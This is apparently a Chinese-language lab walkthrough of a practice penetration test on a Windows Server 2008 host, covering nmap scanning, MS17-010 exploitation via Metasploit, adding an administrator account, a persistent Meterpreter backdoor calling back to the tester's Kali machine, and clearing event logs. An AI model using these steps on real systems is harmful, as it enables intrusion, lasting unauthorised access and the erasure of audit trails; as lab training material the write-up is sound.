文章目录
一、概述
本次渗透测试是在已知Windows server 2008中存在某些漏洞的情况下,进行的验证性测试,目的在于熟悉渗透测试流程,掌握渗透测试工具的基本使用方法。
首先明确我们的渗透测试目标:Windows server 2008(192.168.6.135),
其次明确我们的渗透测试步骤:
- 信息收集
- 漏洞嗅探
- 漏洞利用
- 提权与维权
- 痕迹清理
- 渗透测试总结
最后是明确需要使用到的工具:nmap,MSF,Kali(192.168.6.128).
梳理好这些思路之后,便可以开始我们的渗透测试。
二、信息收集
对主机的信息收集全程使用nmap进行,作为一款强大的信息收集工具,nmap具备了主机探测、端口扫描、服务版本扫描、主机系统指纹识别、漏洞探测等功能。
本次信息收集主要有以下步骤:
1、主机探测
通过对目标主机所在子网进行批量探测,发现目标主机处于活跃状态,并开放了21、80、445、3389等端口。
探测语法:nmap 192.168.6.0/24
2、系统指纹识别
探测语法:nmap -O 192.168.6.135
3、服务指纹识别
对主机进行服务指纹信息探测,收集相关服务信息。
探测语法:nmap -sV 192.168.6.135
4、常见漏洞探测
由于该主机开放了445、3389等端口,通过探测445端口,发现该主机存在ms17-010(永恒之蓝)、ms12-020(远程桌面协议RDP拒绝访问)等高危漏洞。
探测语法:nmap --script=vuln 192.168.6.135
1)445端口下的永恒之蓝漏洞:
2)3389端口下的拒绝访问漏洞
三、漏洞利用、提权与维权
漏洞利用、提权与维权,我们需要用到的是MSF这一个渗透测试工具,借助其强大与全面的攻击模块来进行攻击,对于我们做验证性测试的初学者来说,简单易上手。在此次测试中仅以MS17-010(永恒之蓝)漏洞进行验证测试。
1、MS17-010漏洞利用
1)在MSF中搜索可利用的攻击模块(search ms17-010)
2)选用相应的攻击模块进行攻击,并设置相关参数进行攻击。在这里由于目标系统是win 2008,所以使用第二个通用攻击模块。
3)攻击成功,获得meterpreter后渗透模块。
2、提权与维权
进入shell,查看当前用户权限已经为system权限,为方便后面测试,在管理员用户组添加新用户。
使用persistence创建一个持久性的后门。
语法: run persistence -S -U -X -i 5 -p 4444 -r 192.168.6.128
详细信息如下:
-S:在启动时自动启动代理作为服务,具有系统权限。
-U:在用户登录时自启动代理
-X:在系统启动时自启动代理
-i:每次尝试连接之间的时间间隔(单位为 s)
-p:运行metasploit的用户监听的端口
-r:运行监听程序metasploit用户的IP
在MSF 中设置监听程序,运行后发现对应的后门已经建立:
3、痕迹清除
在meterpreter中使用run event_manager -i
命令可查看日志信息,通过 run event_manager -c
或 clearv
命令清除对登录日志。